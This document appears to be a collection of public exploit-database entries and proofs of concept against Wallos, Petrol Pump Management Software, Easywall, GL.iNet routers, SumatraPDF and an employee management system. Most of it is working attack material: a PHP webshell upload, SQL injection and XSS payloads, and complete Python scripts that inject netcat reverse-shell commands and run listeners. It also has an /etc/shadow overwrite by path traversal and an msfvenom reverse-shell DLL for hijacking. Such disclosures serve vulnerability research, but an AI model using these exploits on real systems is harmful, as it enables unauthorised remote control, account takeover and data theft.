<pre><code># Exploit Title: Wallos - File Upload RCE (Authenticated)<br /># Date: 2024-03-04<br /># Exploit Author: sml@lacashita.com<br /># Vendor Homepage: https://github.com/ellite/Wallos<br /># Software Link: https://github.com/ellite/Wallos<br /># Version: < 1.11.2<br /># Tested on: Debian 12<br /><br />Wallos allows you to upload an image/logo when you create a new subscription.<br />This can be bypassed to upload a malicious .php file.<br /><br />POC<br />---<br /><br />1) Log into the application.<br />2) Go to "New Subscription"<br />3) Upload Logo and choose your webshell .php<br />4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like:<br /><br />--- SNIP -----------------<br /><br />POST /endpoints/subscription/add.php HTTP/1.1<br /><br />Host: 192.168.1.44<br /><br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br /><br />Accept: */*<br /><br />Accept-Language: en-US,en;q=0.5<br /><br />Accept-Encoding: gzip, deflate<br /><br />Referer: http://192.168.1.44/<br /><br />Content-Type: multipart/form-data; boundary=---------------------------29251442139477260933920738324<br /><br />Origin: http://192.168.1.44<br /><br />Content-Length: 7220<br /><br />Connection: close<br /><br />Cookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light<br /><br />-----------------------------29251442139477260933920738324<br /><br />Content-Disposition: form-data; name="name"<br /><br />test<br /><br />-----------------------------29251442139477260933920738324<br /><br />Content-Disposition: form-data; name="logo"; filename="revshell.php"<br /><br />Content-Type: image/jpeg<br /><br />GIF89a;<br /><br /><?php<br />system($_GET['cmd']);<br />?> <br /><br />-----------------------------29251442139477260933920738324<br /><br />Content-Disposition: form-data; name="logo-url"<br /><br />----- SNIP -----<br /><br />5) You will get the response that your file was uploaded ok:<br /><br />{"status":"Success","message":"Subscription updated successfully"}<br /><br /><br />6) Your file will be located in: <br />http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php<br /><br /></code></pre>
<pre><code># Exploit Title: File Upload Remote Code Execution (RCE) in Petrol Pump<br />Management Software v.1.0<br /># Date: 01-03-2024<br /># Exploit Author: Shubham Pandey<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link:<br />https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html<br /># Version: 1.0<br /># Tested on: Windows, Linux<br /># CVE : CVE-2024-27747<br /># Description: File Upload vulnerability in Petrol Pump Management Software<br />v.1.0 allows an attacker to execute arbitrary code via a crafted payload to<br />the email Image parameter in the profile.php component.<br /># POC:<br />1. Here we go to : http://localhost/fuelflow/index.php<br />2. Now login with default username=mayuri.infospace@gmail.com and<br />Password=admin<br />3. Now go to "http://localhost/fuelflow/admin/profile.php"<br />4. Upload the phpinfo.php file in "Image" field<br />5. Phpinfo will be present in "<br />http://localhost/fuelflow/assets/images/phpinfo.php" page<br />6. The content of phpinfo.php file is given below:<br /><?php phpinfo();?><br /># Reference:<br />https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27747.md<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27747<br /></code></pre>
<pre><code># Exploit Title: SQL Injection vulnerability in Petrol Pump Management<br />Software v.1.0.<br /># Date: 01-03-2024<br /># Exploit Author: Shubham Pandey<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link:<br />https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html<br /># Version: 1.0<br /># Tested on: Windows, Linux<br /># CVE : CVE-2024-27746<br /># Description: SQL Injection vulnerability in Petrol Pump Management<br />Software v.1.0 allows an attacker to execute arbitrary code via a crafted<br />payload to the email address parameter in the index.php component.<br /># POC:<br />1. Here we go to : http://localhost/fuelflow/index.php<br />2. Now login with username: test@test.com';SELECT SLEEP(10)# and<br />Password=test<br />3. Page will load for 10 seconds because of time-based sql injection<br /># Reference:<br />https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27746.md<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27746<br /></code></pre>
<pre><code># Exploit Title: Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0<br /># Date: 01-03-2024<br /># Exploit Author: Shubham Pandey<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html<br /># Version: 1.0<br /># Tested on: Windows, Linux<br /># CVE : CVE-2024-27743<br /># Description: Cross Site Scripting vulnerability in Petrol Pump Management<br />Software v.1.0 allows an attacker to execute arbitrary code via a crafted<br />payload to the Address parameter in the add_invoices.php component.<br /># POC:<br />1. Here we go to : http://localhost/fuelflow/index.php<br />2. Now login with default username=mayuri.infospace@gmail.com and<br />Password=admin<br />3. Now go to "http://localhost/fuelflow/admin/add_invoices.php"<br />4. Fill the payload "<script>alert(0)</script>" in "Address" field<br />5. Stored XSS will be present in "<br />http://localhost/fuelflow/admin/manage_invoices.php" page<br /># Reference:<br />https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27743.md<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27743<br /><br /><br />-----<br /><br /># Exploit Title: Cross Site Scripting vulnerability via SVG in Petrol Pump Management Software v.1.0<br /># Date: 01-03-2024<br /># Exploit Author: Shubham Pandey<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html<br /># Version: 1.0<br /># Tested on: Windows, Linux<br /># CVE : CVE-2024-27744<br /># Description: Cross Site Scripting vulnerability in Petrol Pump Management<br />Software v.1.0 allows an attacker to execute arbitrary code via a crafted<br />payload to the image parameter in the profile.php component.<br /># POC:<br />1. Here we go to : http://localhost/fuelflow/index.php<br />2. Now login with default username=mayuri.infospace@gmail.com and<br />Password=admin<br />3. Now go to "http://localhost/fuelflow/admin/profile.php"<br />4. Upload the xss.svg file in "Image" field<br />5. Stored XSS will be present in "<br />http://localhost/fuelflow/assets/images/xss.svg" page<br />6. The content of the xss.svg file is given below:<br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "<br />http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br />><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"<br />stroke="#004400"/><br /> <script type="text/javascript"><br /> alert("XSS by Shubham Pandey");<br /> </script><br /></svg><br /># Reference:<br />https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27744.md<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27744<br /></code></pre>
<pre><code># Exploit Title: Easywall 0.3.1 - Authenticated Remote Command Execution<br /># Date: 30-11-2023<br /># Exploit Author: Melvin Mejia<br /># Vendor Homepage: https://jpylypiw.github.io/easywall/<br /># Software Link: https://github.com/jpylypiw/easywall<br /># Version: 0.3.1<br /># Tested on: Ubuntu 22.04<br /><br />import requests, json, urllib3<br />urllib3.disable_warnings()<br /><br />def exploit():<br /> <br /> # Replace values needed here<br /> target_host = "192.168.1.25"<br /> target_port= "12227"<br /> lhost = "192.168.1.10"<br /> lport = "9001"<br /> user = "admin"<br /> password = "admin"<br /> <br /> target = f"https://{target_host}:{target_port}"<br /><br /> # Authenticate to the app<br /> print("[+] Attempting login with the provided credentials...")<br /> login_data = {"username":user, "password":password}<br /> session = requests.session()<br /> try:<br /> login = session.post(f'{target}/login',data=login_data,verify=False)<br /> except Exception as ex:<br /> print("[!] There was a problem connecting to the app, error:", ex)<br /> exit(1)<br /><br /> if login.status_code != 200:<br /> print("[!] Login failed.")<br /> exit(1)<br /> else:<br /> print("[+] Login successfull.") <br /> <br /> # Send the payload, the port parameter suffers from a command injection vulnerability<br /> print("[+] Attempting to send payload.")<br /> rev_shell = f'/usr/bin/nc {lhost} {lport} -e bash #'<br /> data = {"port":f"123;{rev_shell}", "description":"","tcpudp":"tcp"}<br /> send_payload = session.post(f"{target}/ports-save",data=data,verify=False)<br /> if send_payload.status_code != 200:<br /> print("[!] Failed to send payload.")<br /> exit(1)<br /> else:<br /> print("[+] Payload sent.")<br /><br /> # Trigger the execution of the payload<br /> print("[+] Attempting execution.")<br /> data = {"step_1":"", "step_2":""}<br /> execute = session.post(f"{target}/apply-save",data=data, verify=False)<br /> if execute.status_code != 200:<br /> print("[!] Attempt to execute failed.")<br /> exit(1)<br /> else:<br /> print(f"[+] Execution succeded, you should have gotten a shell at {lhost}:{lport}.")<br /><br />exploit()<br /> <br /><br /></code></pre>
<pre><code>#!/usr/bin/env python3<br /><br /># Exploit Title: GL.iNet <= 3.216 Remote Code Execution via OpenVPN Client<br /># Google Dork: intitle:"GL.iNet Admin Panel"<br /># Date: XX/11/2023<br /># Exploit Author: Michele 'cyberaz0r' Di Bonaventura<br /># Vendor Homepage: https://www.gli-net.com<br /># Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/v1/openwrt-ar300m-3.216-0321-1679391449.tar<br /># Version: 3.216<br /># Tested on: GL.iNet AR300M<br /># CVE: CVE-2023-46456<br /><br />import socket<br />import requests<br />import readline<br />from time import sleep<br />from random import randint<br />from sys import stdout, argv<br />from threading import Thread<br /><br />requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)<br /><br />def generate_random_string():<br /> return ''.join([chr(randint(97, 122)) for x in range(6)])<br /><br />def add_config_file(url, auth_token, payload):<br /> data = {'file': ('{}'.format(payload), 'client\ndev tun\nproto udp\nremote 127.0.0.1 1194\nscript-security 2')}<br /> try:<br /> r = requests.post(url, files=data, headers={'Authorization':auth_token}, verify=False)<br /> r.raise_for_status()<br /> except requests.exceptions.RequestException:<br /> print('[X] Error while adding configuration file')<br /> return False<br /> return True<br /><br />def verify_config_file(url, auth_token, payload):<br /> try:<br /> r = requests.get(url, headers={'Authorization':auth_token}, verify=False)<br /> r.raise_for_status()<br /> if not r.json()['passed'] and payload not in r.json()['passed']:<br /> return False<br /> except requests.exceptions.RequestException:<br /> print('[X] Error while verifying the upload of configuration file')<br /> return False<br /> return True<br /><br />def add_client(url, auth_token):<br /> postdata = {'description':'RCE_client_{}'.format(generate_random_string())}<br /> try:<br /> r = requests.post(url, data=postdata, headers={'Authorization':auth_token}, verify=False)<br /> r.raise_for_status()<br /> except requests.exceptions.RequestException:<br /> print('[X] Error while adding OpenVPN client')<br /> return False<br /> return True<br /><br />def get_client_id(url, auth_token, payload):<br /> try:<br /> r = requests.get(url, headers={'Authorization':auth_token}, verify=False)<br /> r.raise_for_status()<br /> for conn in r.json()['clients']:<br /> if conn['defaultserver'] == payload:<br /> return conn['id']<br /> print('[X] Error: could not find client ID')<br /> return False<br /> except requests.exceptions.RequestException:<br /> print('[X] Error while retrieving added OpenVPN client ID')<br /> return False<br /><br />def connect_vpn(url, auth_token, client_id):<br /> sleep(0.25)<br /> postdata = {'ovpnclientid':client_id, 'enableovpn':'true', 'force_client':'false'}<br /> r = requests.post(url, data=postdata, headers={'Authorization':auth_token}, verify=False)<br /><br />def cleanup(url, auth_token, client_id):<br /> try:<br /> r = requests.post(url, data={'clientid':client_id}, headers={'Authorization':auth_token}, verify=False)<br /> r.raise_for_status()<br /> except requests.exceptions.RequestException:<br /> print('[X] Error while cleaning up OpenVPN client')<br /> return False<br /> return True<br /><br />def get_command_response(s):<br /> res = ''<br /> while True:<br /> try:<br /> resp = s.recv(1).decode('utf-8')<br /> res += resp<br /> except UnicodeDecodeError:<br /> pass<br /> except socket.timeout:<br /> break<br /> return res<br /><br />def revshell_listen(revshell_ip, revshell_port):<br /> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> s.settimeout(5)<br /><br /> try:<br /> s.bind((revshell_ip, int(revshell_port)))<br /> s.listen(1)<br /> except Exception as e:<br /> print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))<br /> exit(1)<br /><br /> try:<br /> clsock, claddr = s.accept()<br /> clsock.settimeout(2)<br /> if clsock:<br /> print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))<br /> res = ''<br /> while True:<br /> command = input('$ ')<br /> clsock.sendall('{}\n'.format(command).encode('utf-8'))<br /> stdout.write(get_command_response(clsock))<br /><br /> except socket.timeout:<br /> print('[-] No connection received in 5 seconds, probably server is not vulnerable...')<br /> s.close()<br /><br /> except KeyboardInterrupt:<br /> print('\n[*] Closing connection')<br /> try:<br /> clsock.close()<br /> except socket.error:<br /> pass<br /> except NameError:<br /> pass<br /> s.close()<br /><br />def main(base_url, auth_token, revshell_ip, revshell_port):<br /> print('[+] Started GL.iNet <= 3.216 OpenVPN client config filename RCE exploit')<br /><br /> payload = '$(busybox nc {} {} -e sh).ovpn'.format(revshell_ip, revshell_port)<br /> print('[+] Filename payload: "{}"'.format(payload))<br /><br /> print('[*] Uploading crafted OpenVPN config file')<br /> if not add_config_file(base_url+'/api/ovpn/client/upload', auth_token, payload):<br /> exit(1)<br /><br /> if not verify_config_file(base_url+'/cgi-bin/api/ovpn/client/uploadcheck', auth_token, payload):<br /> exit(1)<br /> print('[+] File uploaded successfully')<br /><br /> print('[*] Adding OpenVPN client')<br /> if not add_client(base_url+'/cgi-bin/api/ovpn/client/addnew', auth_token):<br /> exit(1)<br /><br /> client_id = get_client_id(base_url+'/cgi-bin/api/ovpn/client/list', auth_token, payload)<br /> if not client_id:<br /> exit(1)<br /> print('[+] Client ID: ' + client_id)<br /><br /> print('[*] Triggering connection to created OpenVPN client')<br /> Thread(target=connect_vpn, args=(base_url+'/cgi-bin/api/ovpn/client/set', auth_token, client_id)).start()<br /><br /> print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))<br /> revshell_listen(revshell_ip, revshell_port)<br /><br /> print('[*] Clean-up by removing OpenVPN connection')<br /> if not cleanup(base_url+'/cgi-bin/api/ovpn/client/remove', auth_token, client_id):<br /> exit(1)<br /><br /> print('[+] Done')<br /><br />if __name__ == '__main__':<br /> if len(argv) < 5:<br /> print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))<br /> exit(1)<br /><br /> main(argv[1], argv[2], argv[3], argv[4])<br /> <br /><br /></code></pre>
<pre><code>#!/usr/bin/env python3<br /><br /># Exploit Title: GL.iNet <= 4.3.7 Remote Code Execution via OpenVPN Client<br /># Google Dork: intitle:"GL.iNet Admin Panel"<br /># Date: XX/11/2023<br /># Exploit Author: Michele 'cyberaz0r' Di Bonaventura<br /># Vendor Homepage: https://www.gli-net.com<br /># Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar<br /># Version: 4.3.7<br /># Tested on: GL.iNet AR300M<br /># CVE: CVE-2023-46454<br /><br />import socket<br />import requests<br />import readline<br />from time import sleep<br />from random import randint<br />from sys import stdout, argv<br />from threading import Thread<br /><br />requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)<br /><br />def trigger_revshell(url, auth_token, payload):<br /> sleep(0.25)<br /> data = {<br /> 'jsonrpc': '2.0',<br /> 'id': randint(1000, 9999),<br /> 'method': 'call',<br /> 'params': [<br /> auth_token,<br /> 'plugins',<br /> 'get_package_info',<br /> {'name': 'bas{}e-files'.format(payload)}<br /> ]<br /> }<br /> requests.post(url, json=data, verify=False)<br /><br />def get_command_response(s):<br /> res = ''<br /> while True:<br /> try:<br /> resp = s.recv(1).decode('utf-8')<br /> res += resp<br /> except UnicodeDecodeError:<br /> pass<br /> except socket.timeout:<br /> break<br /> return res<br /><br />def revshell_listen(revshell_ip, revshell_port):<br /> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> s.settimeout(5)<br /><br /> try:<br /> s.bind((revshell_ip, int(revshell_port)))<br /> s.listen(1)<br /> except Exception as e:<br /> print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))<br /> exit(1)<br /><br /> try:<br /> clsock, claddr = s.accept()<br /> clsock.settimeout(2)<br /> if clsock:<br /> print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))<br /> res = ''<br /> while True:<br /> command = input('$ ')<br /> clsock.sendall('{}\n'.format(command).encode('utf-8'))<br /> stdout.write(get_command_response(clsock))<br /><br /> except socket.timeout:<br /> print('[-] No connection received in 5 seconds, probably server is not vulnerable...')<br /> s.close()<br /><br /> except KeyboardInterrupt:<br /> print('\n[*] Closing connection')<br /> try:<br /> clsock.close()<br /> except socket.error:<br /> pass<br /> except NameError:<br /> pass<br /> s.close()<br /><br />def main(base_url, auth_token, revshell_ip, revshell_port):<br /> print('[+] Started GL.iNet <= 4.3.7 RCE exploit')<br /><br /> payload = '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {} {} >/tmp/f)'.format(revshell_ip, revshell_port)<br /> print('[+] Reverse shell payload: "{}"'.format(payload))<br /><br /> print('[*] Triggering reverse shell connection')<br /> Thread(target=trigger_revshell, args=(base_url+'/rpc', auth_token, payload)).start()<br /><br /> print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))<br /> revshell_listen(revshell_ip, revshell_port)<br /><br /> print('[+] Done')<br /><br />if __name__ == '__main__':<br /> if len(argv) < 5:<br /> print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))<br /> exit(1)<br /><br /> main(argv[1], argv[2], argv[3], argv[4])<br /> <br /><br /></code></pre>
<pre><code>#!/usr/bin/env python3<br /><br /># Exploit Title: GL.iNet <= 4.3.7 Arbitrary File Write<br /># Google Dork: intitle:"GL.iNet Admin Panel"<br /># Date: XX/11/2023<br /># Exploit Author: Michele 'cyberaz0r' Di Bonaventura<br /># Vendor Homepage: https://www.gli-net.com<br /># Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar<br /># Version: 4.3.7<br /># Tested on: GL.iNet AR300M<br /># CVE: CVE-2023-46455<br /><br />import crypt<br />import requests<br />from sys import argv<br /><br />requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)<br /><br />def craft_shadow_file(salted_password):<br /> shadow_content = 'root:{}:19459:0:99999:7:::\n'.format(salted_password)<br /> shadow_content += 'daemon:*:0:0:99999:7:::\n'<br /> shadow_content += 'ftp:*:0:0:99999:7:::\n'<br /> shadow_content += 'network:*:0:0:99999:7:::\n'<br /> shadow_content += 'nobody:*:0:0:99999:7:::\n'<br /> shadow_content += 'dnsmasq:x:0:0:99999:7:::\n'<br /> shadow_content += 'stubby:x:0:0:99999:7:::\n'<br /> shadow_content += 'ntp:x:0:0:99999:7::\n'<br /> shadow_content += 'mosquitto:x:0:0:99999:7::\n'<br /> shadow_content += 'logd:x:0:0:99999:7::\n'<br /> shadow_content += 'ubus:x:0:0:99999:7::\n'<br /> return shadow_content<br /><br />def replace_shadow_file(url, auth_token, shadow_content):<br /> data = {<br /> 'sid': (None, auth_token),<br /> 'size': (None, '4'),<br /> 'path': (None, '/tmp/ovpn_upload/../../etc/shadow'),<br /> 'file': ('shadow', shadow_content)<br /> }<br /> requests.post(url, files=data, verify=False)<br /><br />def main(base_url, auth_token):<br /> print('[+] Started GL.iNet <= 4.3.7 Arbitrary File Write exploit')<br /><br /> password = input('[?] New password for root user: ')<br /> salted_password = crypt.crypt(password, salt=crypt.METHOD_MD5)<br /><br /> shadow_content = craft_shadow_file(salted_password)<br /> print('[+] Crafted shadow file:\n{}'.format(shadow_content))<br /><br /> print('[*] Replacing shadow file with the crafted one')<br /> replace_shadow_file(base_url+'/upload', auth_token, shadow_content)<br /><br /> print('[+] Done')<br /><br />if __name__ == '__main__':<br /> if len(argv) < 3:<br /> print('Usage: {} <TARGET_URL> <AUTH_TOKEN>'.format(argv[0]))<br /> exit(1)<br /><br /> main(argv[1], argv[2])<br /> <br /><br /></code></pre>
<pre><code>SumatraPDF 3.5.2 DLL Hijack<br /><br /># Exploit Title: Sumatra PDF 3.5.2 DLL Hijack<br /># Date: 03.03.2024<br /># Exploit Author: Krishna Vamshi Katta Rokkaiah<br /># Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader<br /># Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer<br /># Version: 3.5.2<br /># Tested on: Windows 11<br /># CVE : CVE-2024-25884<br /><br />Description:<br />In Sumatra PDF version 3.5.2, a DLL hijacking vulnerability is possible allowing a local attacker to get a shell and execute code on the host system in context of the currently logged-on user. This is possible by creating / placing a malicious DLL in the installation directory. The affected DLL is CRYPTBASE.DLL.<br /><br />Proof of Concept:<br /><br />1. Use MSFVenom to create a malicious DLL:<br />msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o CRYPTBASE.DLL<br /><br />2. Copy this file to the Sumatra PDF installation folder:<br />C:\Users\<username>\AppData\Local\SumatraPDF\<br /><br />3. Start a listener in attacking system:<br />nc -nlvp 7777<br /><br />4. Start the Sumatra PDF application and notice a reverse shell in the attacking system.<br /><br />Demo:<br />https://drive.google.com/file/d/1dSJG_JwxPd9ztAzDs6xV4y83-c_83AOx/view<br /></code></pre>
<pre><code>## Title: employee_akpoly-management-system-1.0-2024 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 03/01/2024<br />## Vendor: https://www.sourcecodester.com/users/walterjnr1<br />## Software: https://www.sourcecodester.com/php/16999/employee-management-system.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />Potential SQLi detected in password parameter. Please confirm it<br />manually... The payload from the puncher_SQLi_bypass_authentication<br />module was submitted successfully after the test. You must test<br />manually to confirm this vulnerability! By using this vulnerability<br />the attacker<br />can get control against an admin account and even more bad things!<br /><br />STATUS: HIGH- Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: txtpassword (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR NOT<br />2215=2215# TKHd&btnlogin=<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR (SELECT<br />2145 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT<br />(ELT(2145=2145,1))),0x716a787171,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# JjHm&btnlogin=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' AND (SELECT<br />3563 FROM (SELECT(SLEEP(7)))nLaZ)# ZzRM&btnlogin=<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Walterjnr1/2024/employee_akpoly-1.0-2024)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/03/employeeakpoly-10-2024-multiple-sqli.html)<br /><br />## Time spend:<br />00:35:00<br /><br /><br /></code></pre>